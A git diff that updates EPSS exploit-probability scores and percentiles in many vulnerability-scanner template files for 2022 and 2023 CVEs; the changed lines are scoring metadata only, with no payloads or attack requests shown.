--- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43169 cwe-id: CWE-79 epss-score: 0.09282 - epss-percentile: 0.92495 + epss-percentile: 0.92489 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index 851c7567334..b10564c4729 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43185 cwe-id: CWE-79 epss-score: 0.04792 - epss-percentile: 0.89167 + epss-percentile: 0.89165 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 63fd2a96d3c..e9db77b9e56 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4320 cwe-id: CWE-79 epss-score: 0.11994 - epss-percentile: 0.93562 + epss-percentile: 0.93556 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 2d376092580..88a2edaea84 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-4321 cwe-id: CWE-79 epss-score: 0.07872 - epss-percentile: 0.91754 + epss-percentile: 0.91751 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index a859869b755..5bb51112bfc 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-4325 cwe-id: CWE-79 epss-score: 0.10625 - epss-percentile: 0.93076 + epss-percentile: 0.93069 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4375.yaml b/http/cves/2022/CVE-2022-4375.yaml index e6d2a1085c8..be4f90f6146 100644 --- a/http/cves/2022/CVE-2022-4375.yaml +++ b/http/cves/2022/CVE-2022-4375.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-4375 cwe-id: CWE-89,CWE-707 epss-score: 0.24471 - epss-percentile: 0.95937 + epss-percentile: 0.95942 cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 06787eaab03..692d795f8dd 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 epss-score: 0.93976 - epss-percentile: 0.9988 + epss-percentile: 0.99879 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43939.yaml b/http/cves/2022/CVE-2022-43939.yaml index 1bfd69b08d0..dd5d86c412e 100644 --- a/http/cves/2022/CVE-2022-43939.yaml +++ b/http/cves/2022/CVE-2022-43939.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H cvss-score: 8.6 cve-id: CVE-2022-43939 - epss-score: 0.93789 - epss-percentile: 0.99848 + epss-score: 0.93195 + epss-percentile: 0.99784 cwe-id: CWE-647 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index c2361d17a97..e4aec43e29f 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44290 cwe-id: CWE-89 epss-score: 0.63219 - epss-percentile: 0.9833 + epss-percentile: 0.98332 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index 7ca64b44c90..9cc1d02d74f 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44291 cwe-id: CWE-89 epss-score: 0.63219 - epss-percentile: 0.9833 + epss-percentile: 0.98332 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44356.yaml b/http/cves/2022/CVE-2022-44356.yaml index 077660a6dae..e133875a949 100644 --- a/http/cves/2022/CVE-2022-44356.yaml +++ b/http/cves/2022/CVE-2022-44356.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-44356 epss-score: 0.47061 - epss-percentile: 0.97581 + epss-percentile: 0.97576 cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:m31g3.v5030.200325:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 61a242e2391..9c729915e2c 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44944 cwe-id: CWE-79 epss-score: 0.01093 - epss-percentile: 0.77506 + epss-percentile: 0.77503 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index ff9f4b8868d..5ea9001936a 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44946 cwe-id: CWE-79 epss-score: 0.01093 - epss-percentile: 0.77506 + epss-percentile: 0.77503 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 977e2217438..543512adfb6 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44947 cwe-id: CWE-79 epss-score: 0.01093 - epss-percentile: 0.77506 + epss-percentile: 0.77503 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 23faa03222f..220411841a6 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44948 cwe-id: CWE-79 epss-score: 0.01722 - epss-percentile: 0.81957 + epss-percentile: 0.81955 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 35e1913f5b8..ea2a87b2707 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44949 cwe-id: CWE-79 epss-score: 0.01801 - epss-percentile: 0.82341 + epss-percentile: 0.82339 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 162389b5de6..bc2bf4ec5e3 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44950 cwe-id: CWE-79 epss-score: 0.01801 - epss-percentile: 0.82341 + epss-percentile: 0.82339 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 9889f493e34..f46e0c911d1 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44951 cwe-id: CWE-79 epss-score: 0.01722 - epss-percentile: 0.81957 + epss-percentile: 0.81955 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index db44666db71..d1b2b640adb 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44952 cwe-id: CWE-79 epss-score: 0.01757 - epss-percentile: 0.82151 + epss-percentile: 0.82149 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 9fb1505676f..808a953f9d3 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44957 cwe-id: CWE-79 epss-score: 0.01842 - epss-percentile: 0.82519 + epss-percentile: 0.82517 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 9da080be7ab..71d3b072ec8 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45037 cwe-id: CWE-79 epss-score: 0.21323 - epss-percentile: 0.95511 + epss-percentile: 0.95513 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index eae33addc78..6af6af0acfd 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45038 cwe-id: CWE-79 epss-score: 0.21323 - epss-percentile: 0.95511 + epss-percentile: 0.95513 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45269.yaml b/http/cves/2022/CVE-2022-45269.yaml index 8becaf6b6cd..25c37842920 100644 --- a/http/cves/2022/CVE-2022-45269.yaml +++ b/http/cves/2022/CVE-2022-45269.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45269 cwe-id: CWE-22 epss-score: 0.27373 - epss-percentile: 0.96258 + epss-percentile: 0.96261 cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:* metadata: vendor: gmaolinx diff --git a/http/cves/2022/CVE-2022-45362.yaml b/http/cves/2022/CVE-2022-45362.yaml index 131ed05dd0f..b99d4be180e 100644 --- a/http/cves/2022/CVE-2022-45362.yaml +++ b/http/cves/2022/CVE-2022-45362.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-45362 cwe-id: CWE-918 epss-score: 0.16747 - epss-percentile: 0.94734 + epss-percentile: 0.94731 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 21e1ee71b25..b0f601b8dd0 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-45365 cwe-id: CWE-79 epss-score: 0.1672 - epss-percentile: 0.94728 + epss-percentile: 0.94726 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-45699.yaml b/http/cves/2022/CVE-2022-45699.yaml index 80860aca1df..f261302a912 100644 --- a/http/cves/2022/CVE-2022-45699.yaml +++ b/http/cves/2022/CVE-2022-45699.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45699 cwe-id: CWE-78,CWE-94 epss-score: 0.90791 - epss-percentile: 0.99602 + epss-percentile: 0.99601 cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:* metadata: vendor: apsystems diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 9f9ee0f9871..8f71e527cd0 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-45805 cwe-id: CWE-89 epss-score: 0.29641 - epss-percentile: 0.96477 + epss-percentile: 0.9648 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index 8ecc2ad5b19..cc9bcfc6032 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45835 cwe-id: CWE-918 epss-score: 0.64289 - epss-percentile: 0.98379 + epss-percentile: 0.98381 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 6caec89ca80..aaeae271a69 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46020 cwe-id: CWE-434 epss-score: 0.86493 - epss-percentile: 0.99389 + epss-percentile: 0.99391 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index f5993f91fdd..bf7575e6591 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-46071 cwe-id: CWE-89 epss-score: 0.74602 - epss-percentile: 0.98809 + epss-percentile: 0.98807 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 531c956888b..ee9d73f03ae 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46073 cwe-id: CWE-79 epss-score: 0.29531 - epss-percentile: 0.96465 + epss-percentile: 0.96469 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index f6edf0c84eb..0643e6b8a40 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46443 cwe-id: CWE-89 epss-score: 0.81782 - epss-percentile: 0.99155 + epss-percentile: 0.99157 cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index e9dffb01069..28770454e6b 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-46888 cwe-id: CWE-79 epss-score: 0.16278 - epss-percentile: 0.94617 + epss-percentile: 0.94614 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 17b89763d6f..2f2ad2b4a4c 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-46934 cwe-id: CWE-79 epss-score: 0.12872 - epss-percentile: 0.93827 + epss-percentile: 0.93823 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index 486465f92d9..0c26b7a330a 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-47075 epss-score: 0.92526 - epss-percentile: 0.99726 + epss-percentile: 0.99725 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index b300cd2c687..a07fa778ca3 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-47501 cwe-id: CWE-22 epss-score: 0.8349 - epss-percentile: 0.99255 + epss-percentile: 0.99254 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 072aab8fdff..e709ef13c75 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -21,7 +21,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47966 epss-score: 0.94378 - epss-percentile: 0.99963 + epss-percentile: 0.99962 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48164.yaml b/http/cves/2022/CVE-2022-48164.yaml index d45bbe98459..78b8cafc3d6 100644 --- a/http/cves/2022/CVE-2022-48164.yaml +++ b/http/cves/2022/CVE-2022-48164.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48164 epss-score: 0.83123 - epss-percentile: 0.99236 + epss-percentile: 0.99235 cpe: cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 0857a2b6e44..477f3cd1196 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-48165 cwe-id: CWE-284 epss-score: 0.79241 - epss-percentile: 0.99026 + epss-percentile: 0.99025 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48166.yaml b/http/cves/2022/CVE-2022-48166.yaml index 2d49267277c..2d15747f9f8 100644 --- a/http/cves/2022/CVE-2022-48166.yaml +++ b/http/cves/2022/CVE-2022-48166.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48166 epss-score: 0.6871 - epss-percentile: 0.98562 + epss-percentile: 0.98565 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.201217:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index d4d92fada33..0e300e3c027 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-48197 cwe-id: CWE-79 epss-score: 0.09738 - epss-percentile: 0.92704 + epss-percentile: 0.92698 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 4a82d1249ca..52fb3e00821 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-4897 cwe-id: CWE-79 epss-score: 0.13401 - epss-percentile: 0.93972 + epss-percentile: 0.93968 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4940.yaml b/http/cves/2022/CVE-2022-4940.yaml index db7beafed0a..255592700c0 100644 --- a/http/cves/2022/CVE-2022-4940.yaml +++ b/http/cves/2022/CVE-2022-4940.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2022-4940 - epss-score: 0.11237 - epss-percentile: 0.93294 + epss-score: 0.13527 + epss-percentile: 0.94003 cwe-id: CWE-862 metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 0082663ccd3..334ce1fc87c 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.49412 - epss-percentile: 0.97699 + epss-score: 0.52938 + epss-percentile: 0.97857 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index 7872dcaf1e9..1814bd4c73c 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-0159 epss-score: 0.91615 - epss-percentile: 0.99658 + epss-percentile: 0.99657 cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index d1dc986871e..4bbd8ac0961 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0236 cwe-id: CWE-79 epss-score: 0.20076 - epss-percentile: 0.95297 + epss-percentile: 0.95298 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index d59b0cefeab..91bc19532e1 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0261 cwe-id: CWE-89 epss-score: 0.3054 - epss-percentile: 0.96564 + epss-percentile: 0.96566 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index 282b070e04b..1f79c697302 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0334 cwe-id: CWE-79 epss-score: 0.22931 - epss-percentile: 0.95714 + epss-percentile: 0.95718 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 7874d03a629..f89062425ac 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0448 cwe-id: CWE-79 epss-score: 0.2765 - epss-percentile: 0.96284 + epss-percentile: 0.96287 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 92ec61c2a7d..6ca1e1f3e39 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.12454 - epss-percentile: 0.93698 + epss-percentile: 0.93695 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index e30f5345e07..3cc518e9efd 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.14864 - epss-percentile: 0.94318 + epss-percentile: 0.94314 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index e97097168b7..766edf1c6ae 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-0562 cwe-id: CWE-89 epss-score: 0.81836 - epss-percentile: 0.9916 + epss-percentile: 0.99162 cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index 8dd4217ebb1..c7a892f4e0d 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-0563 cwe-id: CWE-79 epss-score: 0.29762 - epss-percentile: 0.96487 + epss-percentile: 0.9649 cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0676.yaml b/http/cves/2023/CVE-2023-0676.yaml index 34f8ff37056..555ae987af1 100644 --- a/http/cves/2023/CVE-2023-0676.yaml +++ b/http/cves/2023/CVE-2023-0676.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0676 cwe-id: CWE-79 epss-score: 0.00394 - epss-percentile: 0.59738 + epss-percentile: 0.59736 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: vendor: phpipam diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index 549124c37ad..d8ad7aa7a81 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0678 cwe-id: CWE-862 epss-score: 0.63963 - epss-percentile: 0.98364 + epss-percentile: 0.98365 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-0876.yaml b/http/cves/2023/CVE-2023-0876.yaml index a4a9a7fc24a..71816ae8936 100644 --- a/http/cves/2023/CVE-2023-0876.yaml +++ b/http/cves/2023/CVE-2023-0876.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0876 cwe-id: CWE-601 epss-score: 0.09476 - epss-percentile: 0.92583 + epss-percentile: 0.92576 cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 614d88ccf6b..b9c029a203a 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0900 cwe-id: CWE-89 epss-score: 0.04805 - epss-percentile: 0.89177 + epss-percentile: 0.89174 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git 